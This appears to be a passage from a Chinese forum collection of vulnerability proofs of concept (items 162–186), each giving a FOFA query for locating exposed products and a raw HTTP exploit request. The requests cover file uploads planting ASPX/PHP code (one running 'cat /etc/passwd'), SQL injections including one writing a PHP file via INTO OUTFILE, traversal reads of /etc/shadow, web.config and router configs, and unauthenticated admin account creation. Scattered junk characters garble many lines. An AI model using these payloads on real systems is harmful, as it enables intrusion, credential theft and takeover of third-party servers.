162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传( a0 h" ]9 U- k1 V8 B
FOFA: app="和丰山海-数字标牌"7 G S, c5 T+ O
POST /QH.aspx HTTP/1.1
$ N: ]! q/ u3 }4 ]. V# ~! X( xHost: x.x.x.x
# {; A5 r7 T a' L' E4 Z/ ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
3 _& S5 p) x" M! [& C- WConnection: close
+ a9 d/ z' b6 |* NContent-Length: 583
7 y) [, S0 X t8 C4 q# d7 J1 TContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
+ P( F1 ^% }. b, k) UAccept-Encoding: gzip. `+ R9 P% ~6 J: Q6 \* A
: P! @. v5 Y$ U; h+ G$ T! M+ e! p
------WebKitFormBoundaryeegvclmyurlotuey( Y- U0 l, v# e' d1 h$ ~& l7 A
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
: s; {* q: N& y8 }: ~Content-Type: application/octet-stream6 V7 H% [1 ?' O6 B2 |" y
- S) [! o; K) S3 [# Z
<% response.write("ujidwqfuuqjalgkvrpqy") %>/ Z5 Z7 ~6 r, U/ a. c! j( c
------WebKitFormBoundaryeegvclmyurlotuey
& e$ i( b) i8 s" U- a$ NContent-Disposition: form-data; name="action"
1 C5 V$ [6 w) f9 O1 S6 G
! j% F" w/ b* ^: ?2 W! mupload
; p E+ U- x% {2 }6 L1 q Z------WebKitFormBoundaryeegvclmyurlotuey2 d' e8 ~" }, Z: q
Content-Disposition: form-data; name="responderId"( Z+ |6 Z2 ?- q# ]8 X) p' w
5 a* W2 @1 x6 S- U& A
ResourceNewResponder
' G1 [( W' a$ z! s0 [* N5 ? I------WebKitFormBoundaryeegvclmyurlotuey3 z! N( H* C7 | a* _6 Z
Content-Disposition: form-data; name="remotePath"$ @% B1 f3 s* |5 S4 X% ?" _8 c: b T, }
" z# k; W; @, C" C3 x8 f5 n/opt/resources1 x3 q4 o7 G% x- y
------WebKitFormBoundaryeegvclmyurlotuey--
3 M, W S& r S6 M3 s, _. w0 z9 T' e8 |2 F9 l7 z/ G8 ~' a$ [
! L: Z1 O5 f# L2 R; h: d" `
http://x.x.x.x/opt/resources/kjuhitjgk.aspx9 f, w( n+ A$ k$ x4 z
& {1 k; Q0 Y) j& T2 X- U( k163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
3 s2 n& L4 |8 F3 J! F* MFOFA: icon_hash="-795291075"
3 t# H7 @& i# R) {POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
2 L2 \2 q' X- E. hHost: x.x.x.x
6 M4 D3 G p- ?- y1 p# O8 oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36- x' H5 h" y9 W6 S
Connection: close
1 H5 t5 A& X, QContent-Length: 293% f+ a+ x6 f0 N, j( {
Accept: */*
/ e; ~# E. \3 jAccept-Encoding: gzip, deflate
% ?1 ?. \2 ~& f. ZAccept-Language: zh-CN,zh;q=0.9$ w/ i+ k6 g/ p$ |$ G5 n8 e6 m" Y
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
: g) H: o4 N8 D( N4 B( @) U7 {" i+ \" M2 ^3 J
------iiqvnofupvhdyrcoqyuujyetjvqgocod* m0 |4 P! U% V
Content-Disposition: form-data; name="name"
, R) R" h( T9 S" P2 ^
' u" m% s9 |+ p( l1.php" P' Q* B, b! B8 ?+ p; s
------iiqvnofupvhdyrcoqyuujyetjvqgocod
5 Y0 [% Y9 ~4 hContent-Disposition: form-data; name="upfile"; filename="1.php"
: k5 m' y3 F. N m1 I5 J$ hContent-Type: image/jpeg3 G/ O+ p Y6 K/ A
$ S) z( C* z8 x7 Y/ irvjhvbhwwuooyiioxega
: a+ J& N; Z" _------iiqvnofupvhdyrcoqyuujyetjvqgocod--
5 v" ~7 f* x! b8 C. p/ c7 h
( R/ C: x, j$ i: {8 r4 z j/ X+ A4 ^- B- s4 t: d
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
7 A( }# M( y e# p' @FOFA: title="智慧综合管理平台登入") N3 u7 r7 r8 c3 ~' V
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1+ E- ^9 h5 g1 {. ~( x
Host: x.x.x.x1 k" p3 X& x/ t4 t' t3 R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.03 t5 J8 h& W/ c3 k& w
Content-Length: 288
6 o3 Y. e0 C) \+ HAccept: application/json, text/javascript, */*; q=0.016 r! p& |, f1 u+ Q4 F) |
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
- L1 ?9 D0 N4 n( ]Connection: close
- E$ f5 L: W) g4 ^ ]1 q g+ sContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
* O! S2 T+ i; ?- r2 CX-Requested-With: XMLHttpRequest
9 \ ?; {$ f1 s) V2 G1 L* bAccept-Encoding: gzip6 ?) Z- a$ o5 | p. K
9 j% k1 N1 Z" z+ [3 ?* O
------dqdaieopnozbkapjacdbdthlvtlyl
& ^6 p/ `+ `0 [( lContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"% G. u$ k+ Z4 t, T) B- ?0 d C* B( ?: a3 P
Content-Type: image/jpeg3 s2 ` [4 C) K2 y) G" Z; S
! A. R" }" ?. A+ D
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
3 Z( C( i& j2 I U7 b! s------dqdaieopnozbkapjacdbdthlvtlyl--
' [) T, m+ P( U
; T, K* C' h( |. a& l7 {! L4 z! _8 p+ t$ [/ p/ R
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx8 }. `8 i# j# N7 ^* I
4 T% W4 c+ d& ^7 u" @; O8 n) o, h0 q
165. OrangeHRM 3.3.3 SQL 注入- l- s4 t% V0 [$ m" i
CVE-2024-36428
: j; ^0 p; _' L( k6 A: J: qFOFA: app="OrangeHRM-产品"
0 Z) H" _+ B* W; v ~0 q" [& [URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
' W' u$ G7 \$ Y" U2 T- w1 \9 z0 \# f; \! a
/ |$ T/ z) Z' F6 g$ Z166. 中成科信票务管理平台SeatMapHandler SQL注入
! d' o) {0 ^3 y8 u$ MFOFA:body="技术支持:北京中成科信科技发展有限公司"
% ?; P2 e- i; o7 [1 |0 S8 a HPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1# B. L! h( o3 e1 ^7 B) ]9 a' p
Host:6 S9 t# N- g9 |6 L4 j
Pragma: no-cache
# V! Y( F4 @4 L+ J/ E1 j' _Cache-Control: no-cache# ~1 ? V- }: d6 y/ |
Upgrade-Insecure-Requests: 1
- n& z6 T& Z, [; R9 ~" z7 ~6 M8 sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.367 ]6 [$ ]$ m. A. O) b
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 O+ h8 |) q0 K8 g; n; S3 kAccept-Encoding: gzip, deflate9 A' F8 o3 l- ^+ \1 k
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
' K1 G8 v- O8 @! P4 K1 P* o" P" VCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
) z: v* y% u8 T: ]$ oConnection: close0 ]" e$ ~/ T3 D1 f4 ]% I* R4 E$ ]
Content-Type: application/x-www-form-urlencoded% \9 w4 W! }8 e) X# Z+ @6 `" J
Content-Length: 890 Y: E: V$ K' q5 s$ q& o- y
' ]7 d2 F" W% }% Z9 a# i. c. @Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE, s7 g4 c! {' h3 D& N2 K
2 G! R- x! r" F: H( U& q
/ x# P3 Z8 P4 A- H8 m7 [4 B: q; B167. 精益价值管理系统 DownLoad.aspx任意文件读取. ^8 O" s7 X# z0 a( u
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"! d8 R7 l! `6 M7 P, O" k9 T# `
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
9 K. P! j" P+ {Host:9 `" g+ c- D* b9 d V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36# V( E# M' ~# l- Z
Content-Type: application/x-www-form-urlencoded
- w: M& O: ^- {' h* c; U& kAccept-Encoding: gzip, deflate
1 H, I2 x4 q; IAccept: */*5 @( ^/ J+ ~1 Z6 t
Connection: keep-alive7 p9 \* @% h- S, }
! X% U. s. R( K/ y& T! v; l* S5 D( ~- i+ D3 \: @
168. 宏景EHR OutputCode 任意文件读取1 \ b1 A) g8 u# f F
FOFA:app="HJSOFT-HCM"
) T( L) ^0 f1 a7 _/ G- c! I( mGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
* G$ x& s' O4 j# y; G$ \Host: your-ip
# k/ h& W, Q. BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
: M% k9 v( x6 l. z" Z: a$ MContent-Type: application/x-www-form-urlencoded
! U! G) v; T5 K' s5 C* @ yConnection: close7 x* V% y* H% c. J" c+ R( K
; z2 d4 Q0 K( W/ W, o; [, j2 z; ^8 y
E+ [# a( `5 A1 g+ ^5 ?169. 宏景EHR downlawbase SQL注入
, P5 `" s1 o; M9 F; w; K0 B+ |2 cFOFA:app="HJSOFT-HCM"
) w& f! a9 @9 ^) ]* k. h3 iGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.17 ~) l( p' {2 f9 U4 o
Host: your-ip
; l! C2 S9 ~5 d* R( m4 I& _/ v, AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36) _& S3 O" J2 _: V
Accept: */*
6 N/ G! k8 |: X$ i( b/ p9 r6 E5 |Accept-Encoding: gzip, deflate* Z) o1 a& L# c W$ G. o. O! @9 t
Connection: close
: K; y+ B0 u3 x5 \+ |
0 n& f" \# @5 @& w2 H+ e0 R! U. J' K
1 X2 E2 H5 E+ b2 F5 F, Q
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
: V) @% l3 }8 e" a$ s1 ~FOFA:body="/general/sys/hjaxmanage.js"
" Y8 I/ v$ Z7 qPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
) e: j5 `- o8 _1 x1 F3 p* PHost: balalanengliang
( x: {/ H* _4 xUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
$ Q% n! }& j0 m( H& e9 ?+ p* ^Content-Type: application/x-www-form-urlencoded' R1 v/ u6 M: D+ E
; S$ B/ m2 |' U5 i& K9 }filename=../webapps/ROOT/WEB-INF/web.xml( o7 B+ b' h" r. A+ C) ]
& H* S% K' D0 C* |- x I
- \* J( i, c+ U2 N171. 通天星CMSV6车载定位监控平台 SQL注入& M+ R! u' P' l9 i. Q' i' V2 p. L: |5 N
FOFA:body="/808gps/"# [9 g$ \, r" ?/ \
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
$ v$ s# P4 u' c/ Z( `Host: your-ip
' z$ S' s6 P3 _+ C) DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.04 @- g! }- U* G1 P* u1 h! }
Accept: */*
( {# L2 }4 T0 g4 TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. ^6 m" l/ D* Q8 p+ LAccept-Encoding: gzip, deflate
5 q# U# F7 m) {8 J* _. JConnection: close
3 t; f0 i- x$ e* O5 u4 P. F# c7 J S
' q, w' z( {% L6 Q- W
. A K$ l' i1 }6 J% V& B6 o172. DT-高清车牌识别摄像机任意文件读取
. V4 j, l2 [0 v% M' DFOFA:app="DT-高清车牌识别摄像机"1 }$ Q ^' \$ A/ K7 q0 n% C4 z
GET /../../../../etc/passwd HTTP/1.1& y4 ]' V3 t0 m! [7 ~6 y4 n6 m
Host: your-ip
7 A# W7 |! {. E& E) }, AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
: j$ l7 ?, X$ s+ F5 S! |, [Accept-Encoding: gzip, deflate
$ y6 R C: Y1 L6 q, G. n; zAccept: */*
/ d; l* e" x- s* \' j, k6 RConnection: keep-alive
' p, x$ j6 l L* u* K8 P0 T ^0 [6 V- d
j( v- `$ r C6 E* ?: ^7 n
, Z. O! `+ @" {! S) p173. Check Point 安全网关任意文件读取
. D7 Y) {" Q2 \% g9 E3 T: DCVE-2024-24919
! q7 G4 \" @/ j' r8 U: \+ LFOFA:app="Check_Point-SSL-Network-Extender"
& T; W( Z2 e" QPOST /clients/MyCRL HTTP/1.1
6 \, A" t- X3 }6 h K8 r5 aHost: your-ip
9 L4 b& F; x4 v+ M9 J5 nContent-Type: application/x-www-form-urlencoded
& _7 q6 z! |7 l* o5 p/ y; }, s
* a2 R0 _/ z! @& \9 ?$ N' }) N) N* AaCSHELL/../../../../../../../etc/shadow0 P9 ?9 T5 z& t' y; T5 H3 R
; \/ }& Z# @5 M) R/ R& ?, @- g' _
8 k; B/ S. ^, `$ o8 q/ r2 m9 a
% d) N" p' {6 Y- D* Q& m, @* k1 \
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
+ y; n- T3 \% x4 j. yFOFA:app="金和网络-金和OA"
8 U9 p4 M z9 Z/ t) y" H" JGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1. n. @6 o6 K2 D. W3 v: L9 {
Host: your-ip' t6 V1 U Z5 j# G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.363 U$ H8 |; J3 ]: D) f) i4 f+ ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) r3 w% ~% \; R" b% _: ~# l
Accept-Encoding: gzip, deflate, br
" x6 K* m4 C( {3 tAccept-Language: zh-CN,zh;q=0.9
$ d) }2 l% `" z& Q+ iConnection: close
' h4 s0 l* ]3 X/ @. ~/ R/ ]0 Y! x1 R/ K0 H! S0 J0 D
- q' _( g$ N4 f5 w! m
/ U* U8 r) E& y5 i
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入& a) [" ?3 J& s& S7 u
FOFA:app="金和网络-金和OA", q# r- B' h4 u& H+ e. p* `1 K2 R
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.10 g, l7 r+ Y. ^; t$ ]6 c0 w4 |& E$ {
Host:) _5 F2 x9 F. y' s
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
2 H1 F7 u7 Q& O1 G2 r! rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; j3 V! C$ t$ A+ i* R, k$ H
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
\% T/ f# q8 n5 t: c% CAccept-Encoding: gzip, deflate" C+ C7 `! h' G
Connection: close
) M8 c+ I7 s; EUpgrade-Insecure-Requests: 1
$ @) i# c+ Q3 z8 z" s* J3 M0 D8 K" O$ }1 S
9 i6 }$ k% D9 t5 k+ ~* Y
176. 电信网关配置管理系统 rewrite.php 文件上传
! X, E; B, G, HFOFA:body="img/login_bg3.png" && body="系统登录"
, d" _/ N* n _8 _4 |. V* rPOST /manager/teletext/material/rewrite.php HTTP/1.1
+ ^ q" m5 _ u( _Host: your-ip( z+ T1 R/ n+ o: G3 i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
& {& H; E/ U" Y0 K' yContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT! N$ W$ q# h7 n S: @7 F
Connection: close
4 Z, {4 k" i. S7 ?7 r+ x6 |$ J0 _, W7 b& e
------WebKitFormBoundaryOKldnDPT: \8 k2 Q) C3 _3 ^
Content-Disposition: form-data; name="tmp_name"; filename="test.php"* q( p- X, H/ I# b7 ?7 M7 }3 l7 }$ \
Content-Type: image/png
- I+ Z1 m$ z9 F5 k3 h 1 p. ~* M/ k5 K3 Z
<?php system("cat /etc/passwd");unlink(__FILE__);?>
1 t: a; `5 N8 D5 m------WebKitFormBoundaryOKldnDPT5 C4 C, S- b" G+ }/ x% H
Content-Disposition: form-data; name="uploadtime"& k/ Y+ i7 l/ V( \' Q, W
) y# E: i" @% S# c9 i
+ H; O' o0 a7 `2 }9 u/ |. C
------WebKitFormBoundaryOKldnDPT--: c( c6 j' |9 w
( P" t9 y: ?3 _- |$ [0 _4 F$ s7 y2 ~8 e# S, C N
; v0 j0 E% |& k! [! h177. H3C路由器敏感信息泄露
& c* @+ |7 r0 A( _2 {$ l1 T/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg6 G( W6 I( ~" j: \; Z- D) |8 a
/userLogin.asp/../actionpolicy_status/../M60.cfg" F2 p5 L: j# \
/userLogin.asp/../actionpolicy_status/../GR8300.cfg4 F4 S* x p* C7 L' @- A* ?! ^
/userLogin.asp/../actionpolicy_status/../GR5200.cfg! Z4 W9 v# b0 e/ O, _
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
# @+ x5 o# z+ l8 ~' x/userLogin.asp/../actionpolicy_status/../GR2200.cfg$ o% }! ]$ T& r
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg" P3 k i! V! y; v
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
0 n0 |# f& x; b' g" A4 ?$ D6 P7 {/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
$ e- {$ l! M f2 W' V/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
" D8 N- i( c7 Q; }/userLogin.asp/../actionpolicy_status/../ER5200.cfg
" Z8 B" g: t8 d. W1 m/userLogin.asp/../actionpolicy_status/../ER5100.cfg
% h5 t3 B* {" y6 K/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
% _0 L# g- @6 D/userLogin.asp/../actionpolicy_status/../ER3260.cfg
R$ p5 _* C Q7 ^) L. f/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
. s( }3 a R' M6 h& v/userLogin.asp/../actionpolicy_status/../ER3200.cfg* [3 f2 N1 b d) \# T/ h* q
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/ q, O7 Z/ I1 u: c9 r/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
) ?# F) F$ l* Z4 y) o$ c2 I' w/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
$ Q7 b; F* N+ g$ T, h/userLogin.asp/../actionpolicy_status/../ER3100.cfg8 ^ d- c: V$ a* |8 L7 i
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
2 E' p- x2 x8 g. L1 C* {# i9 ~2 m
0 f' D4 u2 x; k178. H3C校园网自助服务系统-flexfileupload-任意文件上传$ |" V( u' }1 R6 C3 b+ c
FOFA:header="/selfservice"
5 h% O3 q' S I6 pPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
0 { I" x3 N; w% _Host:/ D( w8 R }; N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
`; X$ r$ _; u: f; r9 `Content-Length: 252+ ^ ?7 g0 }' j
Accept-Encoding: gzip, deflate9 O; r6 {9 _: Y# ^7 }) ~
Connection: close3 N0 `! E5 I$ O4 H' w
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
( O" ]: q4 ~3 F4 p" i' j% J# n-----------------aqutkea7vvanpqy3rh2l+ N3 L/ C, Q- x. T8 V ^
Content-Disposition: form-data; name="12234.txt"; filename="12234"
0 d- ~$ R' j [ _! F, nContent-Type: application/octet-stream
* d% P( j3 l. m: a IContent-Length: 255
0 @; u, K; r" A) \/ }3 O' a3 @9 z# d4 a8 S0 v( I9 T$ Y
12234
5 Q E+ j- z5 c. `* P-----------------aqutkea7vvanpqy3rh2l--
0 R* Q l/ {* f
% e% s: d: W4 P7 @; n+ W9 L4 q& [# D9 N, Y/ G0 {* c# k Y
GET /imc/primepush/%2e%2e/flex/12234.txt, }0 T1 o1 [& @ ~
( Y- G5 d5 d8 u* d8 w" w0 L1 Q/ }0 a
$ [3 Q; g# S! s5 Z5 s
179. 建文工程管理系统存在任意文件读取
C1 h; B* B0 w, d& R" N2 L# uPOST /Common/DownLoad2.aspx HTTP/1.1
6 D8 V8 Z( o/ X6 \4 d% ?Host: {{Hostname}}1 m, k, e' b- p" a! q
Content-Type: application/x-www-form-urlencoded6 \1 f% l- Y9 m% j5 _; K
User-Agent: Mozilla/5.0, \9 `5 r. g2 ]9 P5 ^8 }; y5 D
) |2 o! j T! m* J; W }
path=../log4net.config&Name=
% j/ E7 d5 J1 A* V$ }3 m; s+ h" o! W: S7 r2 @
" t) I* U. e0 ^- I; n180. 帮管客 CRM jiliyu SQL注入
- ^6 \+ a( J3 E5 DFOFA:app="帮管客-CRM"
9 T% w: V& {0 v bGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
) w% w" h3 y- H5 tHost: your-ip& g0 r: V% k2 B0 @0 R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.361 c' E7 i8 V8 w4 f- x9 R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 p- R# d R2 `3 E- e8 iAccept-Encoding: gzip, deflate0 @' s0 h1 \) F+ \6 l" D2 J+ ^& A' s
Accept-Language: zh-CN,zh;q=0.9
0 w: D5 u8 p- F! HConnection: close" i" i* u2 ^3 `0 }& b
6 `1 F& L' l5 m. t1 ~; s* F& {( C5 [5 f
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
3 J& @% v) k/ Y' g s! U8 mFOFA:"PDCA/js/_publicCom.js"
2 t7 W7 i3 x0 ?7 S6 Z4 @POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1+ M( ] f3 O3 A) n# s: ?; b
Host: your-ip
- M2 J5 X% k6 g' t+ o1 eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36( ]7 N; i8 \& W+ H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 X: a' a- f, m1 [
Accept-Encoding: gzip, deflate, br, B8 p" o$ m1 g8 X3 f% B8 G& E- A
Accept-Language: zh-CN,zh;q=0.9
i( L2 I$ Z U) T; t4 }; W, NConnection: close
f4 g5 ?/ S% K5 r9 O. l3 N1 U* `+ K. gContent-Type: application/x-www-form-urlencoded! r. @2 _5 [; d% ]
+ v$ y Y" W/ n8 F4 X: s2 M8 a) j9 U" g$ r
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
. M) O6 C" e$ s) N$ C
2 |; e" y# T r, I. D k# B* n0 f) X( s) ]- t8 p# K
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
4 b7 l1 q# v$ f" mFOFA:"PDCA/js/_publicCom.js"
3 q: R: g, f4 s& e5 rPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
/ F' w2 v+ g' B' v Q$ [/ UHost: your-ip; V, X/ i# E8 w1 M! c9 u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
: I+ v2 V1 o! I4 ?% xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 y# v; r. A/ C1 f2 ~Accept-Encoding: gzip, deflate, br" C# s" ]9 M {7 t$ }
Accept-Language: zh-CN,zh;q=0.91 p+ S( S8 v1 b6 @, A
Connection: close
" ]/ m B# c) d! g7 H/ D- oContent-Type: application/x-www-form-urlencoded% Z; K; A* Z5 z7 I) W6 G4 J
* B: f' f5 Y, j$ I+ W
) _8 @5 U% D9 n$ M4 susername=test1234&pwd=test1234&savedays=1
9 \4 ]' G% K* K# a. G' {! B* t/ E J9 c6 m: r+ f0 z' }& M, s6 J
S$ B6 z4 p8 f: @( c" }
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入. G1 W3 K2 H; V* w- S. y" G! O
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
' m5 A; p4 x, p1 G5 dGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
E; [7 h5 M' d. J# ZHost: your-ip
8 ?. ?% y8 @# {/ D3 \0 xUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36. P7 e. y \7 S; Q# X0 J+ Q0 [, D8 {3 Z
Accept-Charset: utf-82 x# n' W1 `8 y2 X
Accept-Encoding: gzip, deflate
3 z h: \ ^5 v. G4 NConnection: close! z6 {# N, L2 A
; K7 _' B: g% t; i3 k3 w; f
3 ?+ b3 T- N* T7 X
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加1 r+ X9 e% y, y: p0 I p: q
FOFA:server="SunFull-Webs"
' f! h2 D9 D1 D' A1 nPOST /soap/AddUser HTTP/1.1
% O# ?: ^( \& YHost: your-ip& _: U& f& L4 o: c/ @
Accept-Encoding: gzip, deflate
' A$ ]7 g* A& Q/ M4 d& q% a4 ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0/ y" U# @+ c( W8 t3 X( ^0 Q% @
Accept: application/xml, text/xml, */*; q=0.01
6 ^. N+ e7 p- R, pContent-Type: text/xml; charset=utf-8
9 T: `) f/ i6 R, @ `Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% p) g4 K$ \) A* A* UX-Requested-With: XMLHttpRequest
9 q, H1 W& g) `" d1 k
. J6 D a7 b" S0 P3 c& w; I: v( m T6 w6 R4 U
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56') E' ?# P- q( p8 O1 c
+ Q1 U7 M' a- z& k) P
' U) e, M2 T4 `8 l% h
185. 瑞友天翼应用虚拟化系统SQL注入. z8 M5 R( `) {
version < 7.0.5.15 }% @# Q. a( Y0 m" y# v
FOFA:app="REALOR-天翼应用虚拟化系统"; O+ u' a/ t# |$ l
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
e$ ^! W+ S* e1 u% MHost: host$ [* I" f* {1 f1 y$ U; o4 Z
0 ]' ~- Q- T0 Z, k% G: l( E) T+ d
186. F-logic DataCube3 SQL注入2 i) L" z3 T( d8 j3 v! D
CVE-2024-317505 t; {7 v# N7 c; z7 v Y6 Q; U
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统$ L# }7 m! |$ @5 x5 l
FOFA:title=="DataCube3"
